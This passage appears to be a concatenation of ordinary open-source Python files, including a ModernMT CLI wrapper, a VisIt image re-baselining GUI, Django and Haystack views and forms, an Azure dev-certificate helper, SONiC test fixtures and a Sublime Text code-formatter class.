'std'])) # A B # mean 1.0 4.0 # std 1.0 1.0 print(df_str.agg(['sum', 'min', 'max'])) # A B C # sum 3 12 XYZ # min 0 3 X # max 2 5 Z print(df_str.select_dtypes(include='number').agg(['sum', 'mean'])) # A B # sum 3.0 12.0 # mean 1.0 4.0
cli/mmt/mmtcli.py
Centaurioun/modernmt
154
30206
<reponame>Centaurioun/modernmt import os import re from cli.mmt import MMT_HOME_DIR, MMT_LIB_DIR, MMT_BIN_DIR, MMT_JAR, MMT_PLUGINS_JARS from cli.utils import osutils def __get_java_version(): try: stdout, stderr = osutils.shell_exec(['java', '-version']) java_output = stdout + '\n' + stderr for line in java_output.split('\n'): tokens = line.split() if 'version' in tokens: version = tokens[tokens.index('version') + 1] version = version.strip('"') if version.startswith('1.'): version = version[2:] version = re.match('^[0-9]+', version) return int(version.group()) return None except OSError: return None __java_version = __get_java_version() assert __java_version is not None, 'missing Java executable, please check INSTALL.md' assert __java_version > 7, 'wrong version of Java: required Java 8 or higher' def mmt_env(): llp = (MMT_LIB_DIR + os.pathsep + os.environ['LD_LIBRARY_PATH']) if 'LD_LIBRARY_PATH' in os.environ else MMT_LIB_DIR return dict(os.environ, LD_LIBRARY_PATH=llp, LC_ALL='C.UTF-8', LANG='C.UTF-8') if 'MMT_HOME' not in os.environ: os.environ['MMT_HOME'] = MMT_HOME_DIR # - ModernMT CLI functions --------------------------------------------------------------------------------------------- def mmt_java(main_class, args=None, *, java_ops=None, remote_debug=False, max_heap_mb=None, server=False, logs_path=None): java_ops = java_ops or [] if remote_debug: java_ops.append('-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005') if server: java_ops.append('-server') if max_heap_mb is not None: java_ops.append('-Xms' + str(max_heap_mb) + 'm') java_ops.append('-Xmx' + str(max_heap_mb) + 'm') if logs_path is not None: java_ops += ['-XX:ErrorFile=' + os.path.join(logs_path, 'hs_err_pid%p.log')] java_ops += ['-XX:+PrintGCDateStamps', '-verbose:gc', '-XX:+PrintGCDetails', '-Xloggc:' + os.path.join(logs_path, 'gc.log')] java_ops += ['-XX:+HeapDumpOnOutOfMemoryError', '-XX:HeapDumpPath=' + logs_path] java_ops += ['-XX:+CMSClassUnloadingEnabled', '-XX:+UseConcMarkSweepGC', '-XX:+CMSParallelRemarkEnabled', '-XX:+UseCMSInitiatingOccupancyOnly', '-XX:CMSInitiatingOccupancyFraction=70', '-XX:+ScavengeBeforeFullGC', '-XX:+CMSScavengeBeforeRemark', '-XX:+CMSClassUnloadingEnabled', '-XX:+ExplicitGCInvokesConcurrentAndUnloadsClasses'] else: if max_heap_mb is not None: java_ops.append('-Xmx' + str(max_heap_mb) + 'm') classpath = ':'.join([MMT_JAR] + MMT_PLUGINS_JARS) java_cmd = ['java'] + java_ops + \ ['-cp', classpath, '-Dmmt.home=' + MMT_HOME_DIR, '-Djava.library.path=' + MMT_LIB_DIR, main_class] if args is not None: java_cmd += args return java_cmd def mmt_tmsclean(src_lang, tgt_lang, in_path, out_path, out_format=None, filters=None): args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path] if out_format is not None: args += ['--output-format', out_format] if filters is not None and len(filters) > 0: args += ['--filters'] + filters extended_heap_mb = int(osutils.mem_size() * 90 / 100) java_ops = ['-DentityExpansionLimit=0', '-DtotalEntitySizeLimit=0', '-Djdk.xml.totalEntitySizeLimit=0'] command = mmt_java('eu.modernmt.cli.CleaningPipelineMain', args, max_heap_mb=extended_heap_mb, java_ops=java_ops) osutils.shell_exec(command, env=mmt_env()) def mmt_preprocess(src_lang, tgt_lang, in_paths, out_path, dev_path=None, test_path=None, partition_size=None, quiet=False): args = ['-s', src_lang, '-t', tgt_lang, '--output', out_path, '--input'] if isinstance(in_paths, str): in_paths = [in_paths] args += in_paths if partition_size is not None: args += ['--size', str(partition_size)] if dev_path is not None: args += ['--dev', dev_path] if test_path is not None: args += ['--test', test_path] if quiet: args.append('--quiet') command = mmt_java('eu.modernmt.cli.TrainingPipelineMain', args) osutils.shell_exec(command, env=mmt_env()) def mmt_dedup(src_lang, tgt_lang, in_path, out_path, length_threshold=None, sort=None): args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path] if length_threshold is not None and length_threshold > 0: args += ['-l', length_threshold] if sort is not None: args += ['--sort'] + sort command = mmt_java('eu.modernmt.cli.DeduplicationMain', args) osutils.shell_exec(command, env=mmt_env()) # - Fastalign CLI functions -------------------------------------------------------------------------------------------- def fastalign_build(src_lang, tgt_lang, in_path, out_model, iterations=None, case_sensitive=True, favor_diagonal=True, log=None): os.makedirs(out_model, exist_ok=True) out_model = os.path.join(out_model, '%s__%s.fam' % (src_lang, tgt_lang)) if log is None: log = osutils.DEVNULL command = [os.path.join(MMT_BIN_DIR, 'fa_build'), '-s', src_lang, '-t', tgt_lang, '-i', in_path, '-m', out_model] if iterations is not None: command.extend(['-I', str(iterations)]) if not case_sensitive: command.append('--case-insensitive') if not favor_diagonal: command.append('--no-favor-diagonal') osutils.shell_exec(command, stdout=log, stderr=log, env=mmt_env()) def fastalign_score(src_lang, tgt_lang, model_path, in_path, out_path=None): model_path = os.path.join(model_path, '%s__%s.fam' % (src_lang, tgt_lang)) command = [os.path.join(MMT_BIN_DIR, 'fa_score'), '-s', src_lang, '-t', tgt_lang, '-m', model_path, '-i', in_path, '-o', out_path or in_path] stdout, _ = osutils.shell_exec(command, env=mmt_env()) result = dict() for line in stdout.splitlines(keepends=False): key, value = line.split('=', maxsplit=1) result[key] = float(value) return result['good_avg'], result['good_std_dev'], result['bad_avg'], result['bad_std_dev']
seno/wallet/trading/trade_status.py
emilson0407/seno-blockchain
11,902
30226
from enum import Enum class TradeStatus(Enum): PENDING_ACCEPT = 0 PENDING_CONFIRM = 1 PENDING_CANCEL = 2 CANCELED = 3 CONFIRMED = 4 FAILED = 5
src/test/rebaseline-p.py
visit-dav/vis
226
30238
import filecmp import os import sys import shutil import subprocess import time import unittest if (sys.version_info > (3, 0)): import urllib.request, urllib.parse, urllib.error else: import urllib from optparse import OptionParser from PyQt4 import QtCore,QtGui parser = OptionParser() parser.add_option("-r", "--root", dest="web_root", default="http://portal.nersc.gov/project/visit/", help="Root of web URL where baselines are") parser.add_option("-d", "--date", dest="web_date", help="Date of last good run, in YYMonDD form") parser.add_option("-m", "--mode", dest="mode", help="Mode to run in: serial, parallel, sr") parser.add_option("-w", "--web-url", dest="web_url", help="Manual URL specification; normally generated " "automatically based on (-r, -d, -m)") parser.add_option("-g", "--git", dest="git", action="store_true", help="Use git to ignore images with local modifications") parser.add_option("-s", "--svn", dest="svn", action="store_true", help="Use svn to ignore images with local modifications") (options, args) = parser.parse_args() if options.web_url is not None: uri = options.web_url else: uri = options.web_root + options.web_date + "/" mode = "" if options.mode == "sr" or options.mode == "scalable,parallel" or \ options.mode == "scalable_parallel": mode="davinci_scalable_parallel_icet" else: mode="".join([ s for s in ("davinci_", options.mode) ]) uri += mode + "/" parser.destroy() print("uri:", uri) class MW(QtGui.QMainWindow): def __init__(self, parent=None): QtGui.QMainWindow.__init__(self, parent) def real_dirname(path): """Python's os.path.dirname is not dirname.""" return path.rsplit('/', 1)[0] def real_basename(path): """Python's os.path.basename is not basename.""" if path.rsplit('/', 1)[1] is '': return None return path.rsplit('/', 1)[1] def baseline_current(serial_baseline): """Given the path to the serial baseline image, determine if there is a mode specific baseline. Return a 2-tuple of the baseline image and the path to the 'current' image.""" dname = real_dirname(serial_baseline) bname = real_basename(serial_baseline) baseline = serial_baseline if options.mode is not None: # Check for a mode specific baseline. mode_spec = os.path.join(dname + "/", options.mode + "/", bname) if os.path.exists(mode_spec): baseline = mode_spec # `Current' image never has a mode-specific path; filename/dir is always # based on the serial baseline's directory. no_baseline = serial_baseline.split('/', 1) # path without "baseline/" current = os.path.join("current/", no_baseline[1]) return (baseline, current) def mode_specific(baseline): """Given a baseline image path, return a path to the mode specific baseline, even if said baseline does not exist (yet).""" if options.mode is None or options.mode == "serial": return baseline dname = real_dirname(baseline) bname = real_basename(baseline) if options.mode == "parallel": if baseline.find("/parallel") != -1: # It's already got parallel in the path; this IS a mode specific # baseline. return baseline return os.path.join(dname, options.mode, bname) if options.mode.find("scalable") != -1: if baseline.find("scalable_parallel") != -1: # Already is mode-specific. return baseline return os.path.join(dname, "scalable_parallel", bname) # Ruh roh. options.mode must be garbage. raise NotImplementedError("Unknown mode '%s'" % options.mode) def local_modifications_git(file): vcs_diff = subprocess.call(["git", "diff", "--quiet", file]) if vcs_diff == 1: return True return False def local_modifications_svn(file): svnstat = subprocess.Popen("svn stat %s" % file, shell=True, stdout=subprocess.PIPE) diff = svnstat.communicate()[0] if diff != '': return True return False def local_modifications(filepath): """Returns true if the file has local modifications. Always false if the user did not supply the appropriate VCS option.""" if options.git: return local_modifications_git(filepath) if options.svn: return local_modifications_svn(filepath) return False def equivalent(baseline, image): """True if the files are the same.""" if not os.path.exists(image): return False # Note this is `shallow' by default, but that's fine for our usage. return filecmp.cmp(baseline, image) def trivial_pass(baseline, image): """True if we can determine that this image is OK without querying the network.""" return equivalent(baseline, image) or local_modifications(baseline) class RebaselinePTests(unittest.TestCase): def test_dirname(self): input_and_results = [ ("baseline/category/test/a.png", "baseline/category/test"), ("b/c/t/q.png", "b/c/t"), ("b/c/t/longfn.png", "b/c/t"), ("b/c/t/", "b/c/t") ] for tst in input_and_results: self.assertEqual(real_dirname(tst[0]), tst[1]) def test_basename(self): input_and_results = [ ("baseline/category/test/a.png", "a.png"), ("b/c/t/q.png", "q.png"), ("b/c/t/longfn.png", "longfn.png"), ("b/c/t/", None) ] for tst in input_and_results: self.assertEqual(real_basename(tst[0]), tst[1]) class Image(QtGui.QWidget): def __init__(self, path, parent=None): self._filename = path self._parent = parent self._display = QtGui.QLabel(self._parent) self._load() def _load(self): pixmap = QtGui.QPixmap(300,300) pixmap.load(self._filename) self._display.resize(pixmap.size()) self._display.setPixmap(pixmap) def widget(self): return self._display def width(self): return self._display.width() def height(self): return self._display.height() def update(self, path): self._filename = path self._load() class Layout(QtGui.QWidget): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self._mainwin = parent self._mainwin.statusBar().insertPermanentWidget(0,QtGui.QLabel()) self.status("Initializing...") quit = QtGui.QPushButton('Quit', self) quit.setMaximumWidth(80) if parent is None: parent = self parent.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.SLOT('quit()')) parent.connect(self, QtCore.SIGNAL('closeApp()'), self._die) self._init_signals() self._bugs = [] # list which keeps track of which images we think are bugs. # guess an initial size; we don't know a real size until we've downloaded # images. self.resize_this_and_mainwin(600, 600) self.setFocusPolicy(QtCore.Qt.StrongFocus) self.setFocus() self._baseline = None self._current = None self._diff = None self._images = [None, None, None] self._next_set_of_images() self._images[0] = Image(self._baseline, self) self._images[1] = Image(self._current, self) self._images[2] = Image(self._diff, self) grid = QtGui.QGridLayout() label_baseline = QtGui.QLabel(grid.widget()) label_current = QtGui.QLabel(grid.widget()) label_diff = QtGui.QLabel(grid.widget()) label_baseline.setText("Baseline image:") label_current.setText("Davinci's current:") label_diff.setText("difference between them:") label_baseline.setMaximumSize(QtCore.QSize(160,35)) label_current.setMaximumSize(QtCore.QSize(160,35)) label_diff.setMaximumSize(QtCore.QSize(200,35)) label_directions = QtGui.QLabel(grid.widget()) label_directions.setText("Keyboard shorcuts:\n\n" "y: yes, rebaseline\n" "n: no, current image is wrong\n" "u: unknown, I can't/don't want to decide now\n" "q: quit") label_directions.setMaximumSize(QtCore.QSize(300,300)) grid.addWidget(label_baseline, 0,0) grid.addWidget(label_current, 0,1) grid.addWidget(self._images[0].widget(), 1,0) grid.addWidget(self._images[1].widget(), 1,1) grid.addWidget(label_diff, 2,0) grid.addWidget(quit, 2,1) grid.addWidget(self._images[2].widget(), 3,0) grid.addWidget(label_directions, 3,1) rows = ( (0, (label_baseline, label_current)), (1, (self._images[0], self._images[1])), (2, (label_diff, quit)), (3, (self._images[2], label_directions)) ) cols = ( (0, (label_baseline, self._images[0], label_diff, self._images[2])), (1, (label_current, self._images[1], quit, label_directions)) ) for r in rows: grid.setRowMinimumHeight(r[0], max([x.height() for x in r[1]])) for c in cols: grid.setColumnMinimumWidth(c[0], max([x.height() for x in c[1]])) self.setLayout(grid) self.resize_this_and_mainwin(self.calc_width(), self.calc_height()) self.show() self.setFocus() def resize_this_and_mainwin(self, w, h): self.resize(w,h) # make sure it can't shrink too much self._mainwin.setMinimumWidth(w) self._mainwin.setMinimumHeight(h+30) # +30: for the status bar # try not to resize the mainwin if we don't need to; it's annoying. cur_w = self._mainwin.width() cur_h = self._mainwin.height() self._mainwin.resize(max(w,cur_w), max(h,cur_h)) self._mainwin.update() def _die(self): print("You thought these test results were bugs:") for f in self._bugs: print("\t", f) self._mainwin.close() def calc_width(self): w = 0 for col in range(0,self.layout().columnCount()): w += self.layout().columnMinimumWidth(col) return w def calc_height(self): h = 0 for row in range(0,self.layout().rowCount()): h += self.layout().rowMinimumHeight(row) return h def _update_images(self): self._images[0].update(self._baseline) self._images[1].update(self._current) self._images[2].update(self._diff) self.resize_this_and_mainwin(self.calc_width(), self.calc_height()) self.update() def _rebaseline(self): self.status("".join(["rebaselining ", self._current, "..."])) baseline = mode_specific(self._baseline) print("moving", self._current, "on top of", baseline) # We might be creating the first mode specific baseline for that test. If # so, it'll be missing the baseline specific dir. if not os.path.exists(real_dirname(baseline)): print(real_dirname(baseline), "does not exist, creating...") os.mkdir(real_dirname(baseline)) shutil.move(self._current, baseline) # do the rebaseline! self._next_set_of_images() self._update_images() def _ignore(self): self.status("".join(["ignoring ", self._baseline, "..."])) self._bugs.append(self._baseline) self._next_set_of_images() self._update_images() def _unknown(self): self.status("".join(["unknown ", self._baseline, "..."])) self._next_set_of_images() self._update_images() def status(self, msg): self._mainwin.statusBar().showMessage(msg) self._mainwin.statusBar().update() QtCore.QCoreApplication.processEvents() # we're single threaded def _next_set_of_images(self): """Figures out the next set of images to display. Downloads 'current' and 'diff' results from davinci. Sets filenames corresponding to baseline, current and diff images.""" if self._baseline is None: # first call, build list. self._imagelist = [] print("Building initial file list... please wait.") self.status("Building initial file list... please wait.") for root, dirs, files in os.walk("baseline"): for f in files: fn, ext = os.path.splitext(f) if ext == ".png": # In some cases, we can trivially reject a file. Don't bother # adding it to our list in that case. serial_baseline_fn = os.path.join(root, f) # Does this path contain "parallel" or "scalable_parallel"? Then # we've got a mode specific baseline. We'll handle those based on # the serial filenames, so ignore them for now. if serial_baseline_fn.find("parallel") != -1: continue baseline_fn, current_fn = baseline_current(serial_baseline_fn) assert os.path.exists(baseline_fn) if not trivial_pass(baseline_fn, current_fn): self._imagelist.append(baseline_fn) try: while len(self._imagelist) > 0: self._baseline = self._imagelist.pop() # now derive other filenames based on that one. filename = None # os.path.split fails if there's no / try: filename = os.path.split(self._baseline) filename = filename[1] except AttributeError as e: self.status("No slash!") break current_url = uri + "/c_" + filename if (sys.version_info > (3, 0)): f,info = urllib.request.urlretrieve(current_url, "local_current.png") else: f,info = urllib.urlretrieve(current_url, "local_current.png") self.status("".join(["Checking ", current_url, "..."])) if info.getheader("Content-Type").startswith("text/html"): # then it's a 404 or other error; skip this image. continue else: # We found the next image. self._current = "local_current.png" diff_url = uri + "/d_" + filename if (sys.version_info > (3, 0)): f,info = urllib.request.urlretrieve(diff_url, "local_diff.png") else: f,info = urllib.urlretrieve(diff_url, "local_diff.png") if info.getheader("Content-Type").startswith("text/html"): raise Exception("Could not download diff image.") self._diff = "local_diff.png" self.status("Waiting for input on " + filename) break except KeyError as e: print(e) print("No more images!") self.emit(QtCore.SIGNAL('closeApp()')) def _init_signals(self): self.connect(self, QtCore.SIGNAL('rebaseline()'), self._rebaseline) self.connect(self, QtCore.SIGNAL('ignore()'), self._ignore) self.connect(self, QtCore.SIGNAL('unknown()'), self._unknown) def keyPressEvent(self, event): if event.key() == QtCore.Qt.Key_Q: self.emit(QtCore.SIGNAL('closeApp()')) if event.key() == QtCore.Qt.Key_Y: self.emit(QtCore.SIGNAL('rebaseline()')) if event.key() == QtCore.Qt.Key_N: self.emit(QtCore.SIGNAL('ignore()')) if event.key() == QtCore.Qt.Key_U: self.emit(QtCore.SIGNAL('unknown()')) QtCore.QCoreApplication.processEvents() if __name__ == '__main__': suite = unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests) results = unittest.TextTestRunner(verbosity=2).run(suite) if not results.wasSuccessful(): print("Tests failed, bailing.") sys.exit(1) app = QtGui.QApplication(sys.argv) mw = MW() mw.show() mw.setWindowTitle("visit rebaseline -p") layout = Layout(mw) layout.show() sys.exit(app.exec_())
server/base/views.py
arubdesu/zentral
634
30267
import logging from django.apps import apps from django.contrib.auth.mixins import LoginRequiredMixin from django.http import Http404, HttpResponse, JsonResponse from django.views.generic import TemplateView, View from zentral.core.stores import frontend_store logger = logging.getLogger("server.base.views") class HealthCheckView(View): def get(self, request, *args, **kwargs): return HttpResponse('OK') class IndexView(LoginRequiredMixin, TemplateView): template_name = "base/index.html" def get_context_data(self, **kwargs): context = super(IndexView, self).get_context_data(**kwargs) app_list = [] for app_name, app_config in apps.app_configs.items(): if getattr(app_config, "events_module", None) is not None: app_list.append(app_name) app_list.sort() context["apps"] = app_list return context class AppHistogramDataView(LoginRequiredMixin, View): INTERVAL_DATE_FORMAT = { "hour": "%H:%M", "day": "%d/%m", "week": "%d/%m", "month": "%m/%y", } def get(self, request, *args, **kwargs): app = kwargs['app'] try: zentral_app = apps.app_configs[app] search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT") except (KeyError, AttributeError): raise Http404 interval = kwargs["interval"] try: date_format = self.INTERVAL_DATE_FORMAT[interval] except KeyError: raise Http404 labels = [] event_count_data = [] unique_msn_data = [] for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]), **search_dict): labels.append(dt.strftime(date_format)) event_count_data.append(event_count) unique_msn_data.append(unique_msn) datasets = {"event_count": { "label": "{} events".format(app), "backgroundColor": "rgba(122, 182, 160, 0.7)", "data": event_count_data }, "unique_msn": { "label": "{} machines".format(app), "backgroundColor": "rgba(225, 100, 86, 0.7)", "data": unique_msn_data }} return JsonResponse({"app": app, "labels": labels, "datasets": datasets})
hs_core/discovery_form.py
tommac7/hydroshare
178
30280
from haystack.forms import FacetedSearchForm from haystack.query import SQ from django import forms from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \ FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability'] class DiscoveryForm(FacetedSearchForm): SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified') SORT_ORDER_CHOICES = (('title', 'Title'), ('author', 'First Author'), ('created', 'Date Created'), ('modified', 'Last Modified')) SORT_DIRECTION_VALUES = ('', '-') SORT_DIRECTION_CHOICES = (('', 'Ascending'), ('-', 'Descending')) NElat = forms.CharField(widget=forms.HiddenInput(), required=False) NElng = forms.CharField(widget=forms.HiddenInput(), required=False) SWlat = forms.CharField(widget=forms.HiddenInput(), required=False) SWlng = forms.CharField(widget=forms.HiddenInput(), required=False) start_date = forms.DateField(label='From Date', required=False) end_date = forms.DateField(label='To Date', required=False) coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False) sort_order = forms.CharField(label='Sort By:', widget=forms.Select(choices=SORT_ORDER_CHOICES), required=False) sort_direction = forms.CharField(label='Sort Direction:', widget=forms.Select(choices=SORT_DIRECTION_CHOICES), required=False) def search(self): self.parse_error = None # error return from parser sqs = self.searchqueryset.all().filter(replaced=False) if self.cleaned_data.get('q'): # The prior code corrected for an failed match of complete words, as documented # in issue #2308. This version instead uses an advanced query syntax in which # "word" indicates an exact match and the bare word indicates a stemmed match. cdata = self.cleaned_data.get('q') try: parser = ParseSQ() parsed = parser.parse(cdata) sqs = sqs.filter(parsed) except ValueError as e: sqs = self.searchqueryset.none() self.parse_error = "Value error: {}. No matches. Please try again".format(e.value) return sqs except MatchingBracketsNotFoundError as e: sqs = self.searchqueryset.none() self.parse_error = "{} No matches. Please try again.".format(e.value) return sqs except MalformedDateError as e: sqs = self.searchqueryset.none() self.parse_error = "{} No matches. Please try again.".format(e.value) return sqs except FieldNotRecognizedError as e: sqs = self.searchqueryset.none() self.parse_error = \ ("{} Field delimiters include title, contributor, subject, etc. " + "Please try again.")\ .format(e.value) return sqs except InequalityNotAllowedError as e: sqs = self.searchqueryset.none() self.parse_error = "{} No matches. Please try again.".format(e.value) return sqs geo_sq = None if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']: if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']): geo_sq = SQ(east__lte=float(self.cleaned_data['NElng'])) geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND) else: geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng'])) geo_sq.add(SQ(east__lte=float(180)), SQ.OR) geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND) geo_sq.add(SQ(east__gte=float(-180)), SQ.AND) if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']: # latitude might be specified without longitude if geo_sq is None: geo_sq = SQ(north__lte=float(self.cleaned_data['NElat'])) else: geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND) geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND) if geo_sq is not None: sqs = sqs.filter(geo_sq) # Check to see if a start_date was chosen. start_date = self.cleaned_data['start_date'] end_date = self.cleaned_data['end_date'] # allow overlapping ranges # cs < s < ce OR s < cs => s < ce # AND # cs < e < ce OR e > ce => cs < e if start_date and end_date: sqs = sqs.filter(SQ(end_date__gte=start_date) & SQ(start_date__lte=end_date)) elif start_date: sqs = sqs.filter(SQ(end_date__gte=start_date)) elif end_date: sqs = sqs.filter(SQ(start_date__lte=end_date)) if self.cleaned_data['coverage_type']: sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']]) creator_sq = None contributor_sq = None owner_sq = None subject_sq = None content_type_sq = None availability_sq = None # We need to process each facet to ensure that the field name and the # value are quoted correctly and separately: for facet in self.selected_facets: if ":" not in facet: continue field, value = facet.split(":", 1) value = sqs.query.clean(value) if value: if "creator" in field: if creator_sq is None: creator_sq = SQ(creator__exact=value) else: creator_sq.add(SQ(creator__exact=value), SQ.OR) if "contributor" in field: if contributor_sq is None: contributor_sq = SQ(contributor__exact=value) else: contributor_sq.add(SQ(contributor__exact=value), SQ.OR) elif "owner" in field: if owner_sq is None: owner_sq = SQ(owner__exact=value) else: owner_sq.add(SQ(owner__exact=value), SQ.OR) elif "subject" in field: if subject_sq is None: subject_sq = SQ(subject__exact=value) else: subject_sq.add(SQ(subject__exact=value), SQ.OR) elif "content_type" in field: if content_type_sq is None: content_type_sq = SQ(content_type__exact=value) else: content_type_sq.add(SQ(content_type__exact=value), SQ.OR) elif "availability" in field: if availability_sq is None: availability_sq = SQ(availability__exact=value) else: availability_sq.add(SQ(availability__exact=value), SQ.OR) else: continue if creator_sq is not None: sqs = sqs.filter(creator_sq) if contributor_sq is not None: sqs = sqs.filter(contributor_sq) if owner_sq is not None: sqs = sqs.filter(owner_sq) if subject_sq is not None: sqs = sqs.filter(subject_sq) if content_type_sq is not None: sqs = sqs.filter(content_type_sq) if availability_sq is not None: sqs = sqs.filter(availability_sq) return sqs
scripts/devops_tasks/trust_proxy_cert.py
vincenttran-msft/azure-sdk-for-python
2,728
30287
<filename>scripts/devops_tasks/trust_proxy_cert.py import requests import os EXISTING_ROOT_PEM = requests.certs.where() root_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), "..", "..", "..")) LOCAL_DEV_CERT = os.path.abspath(os.path.join(root_dir, 'eng', 'common', 'testproxy', 'dotnet-devcert.crt')) COMBINED_FILENAME = os.path.basename(LOCAL_DEV_CERT).split(".")[0] + ".pem" COMBINED_FOLDER = os.path.join(root_dir, '.certificate') COMBINED_LOCATION = os.path.join(COMBINED_FOLDER, COMBINED_FILENAME) def copy_cert_content(): with open(LOCAL_DEV_CERT, 'r') as f: data = f.read() if not os.path.exists(COMBINED_FOLDER): os.mkdir(COMBINED_FOLDER) with open(COMBINED_LOCATION, 'w') as f: f.write(data) def combine_cert_file(): with open(EXISTING_ROOT_PEM, 'r') as f: content = f.readlines(); with open(COMBINED_LOCATION, 'a') as f: f.writelines(content) if __name__ == "__main__": copy_cert_content() combine_cert_file() print("Set the following certificate paths:") print("\tSSL_CERT_DIR={}".format(os.path.dirname(COMBINED_LOCATION))) print("\tREQUESTS_CA_BUNDLE={}".format(COMBINED_LOCATION)) if os.getenv('TF_BUILD', False): print("##vso[task.setvariable variable=SSL_CERT_DIR]{}".format(os.path.dirname(COMBINED_LOCATION))) print("##vso[task.setvariable variable=REQUESTS_CA_BUNDLE]{}".format(COMBINED_LOCATION))
tests/stress/conftest.py
lolyu/sonic-mgmt
132
30303
import logging import pytest from tests.common.utilities import wait_until from utils import get_crm_resources, check_queue_status, sleep_to_wait CRM_POLLING_INTERVAL = 1 CRM_DEFAULT_POLL_INTERVAL = 300 MAX_WAIT_TIME = 120 logger = logging.getLogger(__name__) @pytest.fixture(scope='module') def get_function_conpleteness_level(pytestconfig): return pytestconfig.getoption("--completeness_level") @pytest.fixture(scope="module", autouse=True) def set_polling_interval(duthost): wait_time = 2 duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL)) logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time)) time.sleep(wait_time) yield duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL)) logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time)) time.sleep(wait_time) @pytest.fixture(scope='module') def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo): ptf_ip = tbinfo["ptf_ip"] topo_name = tbinfo["topo"]["name"] logger.info("withdraw existing ipv4 and ipv6 routes") localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/") wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True) sleep_to_wait(CRM_POLLING_INTERVAL * 100) ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used") ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used") logger.info("ipv4 route used {}".format(ipv4_route_used_before)) logger.info("ipv6 route used {}".format(ipv6_route_used_before)) yield ipv4_route_used_before, ipv6_route_used_before logger.info("announce existing ipv4 and ipv6 routes") localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/") wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True) sleep_to_wait(CRM_POLLING_INTERVAL * 5) logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used"))) logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
codeformatter/formatter.py
ephenyxshop/sublimetext-codeformatter
676
30342
# @author <NAME> # @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>) # @link http://longman.me # @license The MIT License (MIT) import os import sys import re import sublime directory = os.path.dirname(os.path.realpath(__file__)) libs_path = os.path.join(directory, 'lib') if libs_path not in sys.path: sys.path.append(libs_path) try: # Python 3 from .phpformatter import PhpFormatter from .jsformatter import JsFormatter from .htmlformatter import HtmlFormatter from .cssformatter import CssFormatter from .scssformatter import ScssFormatter from .pyformatter import PyFormatter from .vbscriptformatter import VbscriptFormatter from .coldfusionformatter import ColdfusionFormatter from .goformatter import GoFormatter except (ValueError): # Python 2 from phpformatter import PhpFormatter from jsformatter import JsFormatter from htmlformatter import HtmlFormatter from cssformatter import CssFormatter from scssformatter import ScssFormatter from pyformatter import PyFormatter from vbscriptformatter import VbscriptFormatter from coldfusionformatter import ColdfusionFormatter from goformatter import GoFormatter class Formatter: def __init__(self, view, syntax=None): self.platform = sublime.platform() self.classmap = {} self.st_version = 2 if sublime.version() == '' or int(sublime.version()) > 3000: self.st_version = 3 self.file_name = view.file_name() self.settings = sublime.load_settings('CodeFormatter.sublime-settings') self.packages_path = sublime.packages_path() self.syntax_file = view.settings().get('syntax') self.syntax = syntax or self.get_syntax() # map of settings names with related class map_settings_formatter = [ ('codeformatter_php_options', PhpFormatter), ('codeformatter_js_options', JsFormatter), ('codeformatter_css_options', CssFormatter), ('codeformatter_html_options', HtmlFormatter), ('codeformatter_python_options', PyFormatter), ('codeformatter_vbscript_options', VbscriptFormatter), ('codeformatter_scss_options', ScssFormatter), ('codeformatter_coldfusion_options', ColdfusionFormatter), ('codeformatter_go_options', GoFormatter), ] for name, _class in map_settings_formatter: syntaxes = self.settings.get(name, {}).get('syntaxes') if not syntaxes or not isinstance(syntaxes, str): continue for _formatter in syntaxes.split(','): self.classmap[_formatter.strip()] = _class def format(self, text): formatter = self.classmap[self.syntax](self) try: stdout, stderr = formatter.format(text) except Exception as e: stdout = '' stderr = str(e) return self.clean(stdout), self.clean(stderr) def exists(self): return self.syntax in self.classmap def get_syntax(self): pattern = re.compile( r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)') m = pattern.search(self.syntax_file) found = '' if m and len(m.groups()) > 0: found = m.groups()[0] return found.lower() def format_on_save_enabled(self): if not self.exists(): return False formatter = self.classmap[self.syntax](self) return formatter.format_on_save_enabled(self.file_name) def clean(self, string): if hasattr(string, 'decode'): string = string.decode('UTF-8', 'ignore') return re.sub(r'\r\n|\r', '\n', string)
iotbx/xds/xds_cbf.py
dperl-sol/cctbx_project
155
30344
